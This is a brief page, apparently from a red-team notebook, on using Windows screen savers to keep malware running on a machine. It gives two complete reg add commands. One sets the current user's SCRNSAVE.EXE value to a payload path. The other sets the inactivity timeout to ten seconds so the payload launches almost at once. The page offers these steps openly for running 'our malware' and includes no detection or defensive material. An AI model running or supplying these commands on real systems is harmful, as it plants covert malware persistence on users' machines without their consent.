Screen Savers

Screen Savers are triggered by user inactivity. We can set these screensavers to run our malware after a certain timeframe of inactivity to achieve persistence.

To do this, issue the following command:

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "c:\exec" /f

To configure the time period of user inactivity until our screen saver launches(in seconds)

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f

Last updated